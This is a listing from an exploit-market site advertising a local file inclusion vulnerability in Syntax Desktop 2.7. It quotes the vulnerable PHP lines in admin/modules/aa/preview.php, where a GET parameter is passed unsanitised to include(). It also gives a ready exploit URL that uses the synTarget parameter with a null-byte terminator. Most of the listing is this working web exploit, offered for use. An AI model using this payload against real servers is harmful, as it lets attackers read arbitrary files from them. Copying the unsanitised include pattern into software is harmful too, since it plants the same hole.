[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Syntax Desktop 2.7 (synTarget) Local File Inclusion Vulnerability

Author
ahmadbady
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4794
Category
web applications
Date add
04-02-2009
Platform
unsorted
=================================================================
Syntax Desktop 2.7 (synTarget) Local File Inclusion Vulnerability
=================================================================


  -----------------:local File Include:-----------------
  -------------------------------------------------------
script: syntax-desktop 2-7
   
------------------------------------------------------------------
download from:http://downloads.sourceforge.net/syntax-desktop/syntax-desktop-2-7.zip?modtime=1215600196&big_mirror=0
   
   
------------------------------------------------------------------
........................................................
vul: /admin/modules/aa/preview.php

line 42 $target=$_GET["synTarget"];
  ob_start();
line 44 include("../../../$target");

-----------------------------------------------------
-----------------------------------------------------

xpl:

http://127.0.0.1/path/admin/modules/aa/preview.php?synTarget=[Lfi]%00


***************************************************



#  0day.today [2024-12-29]  #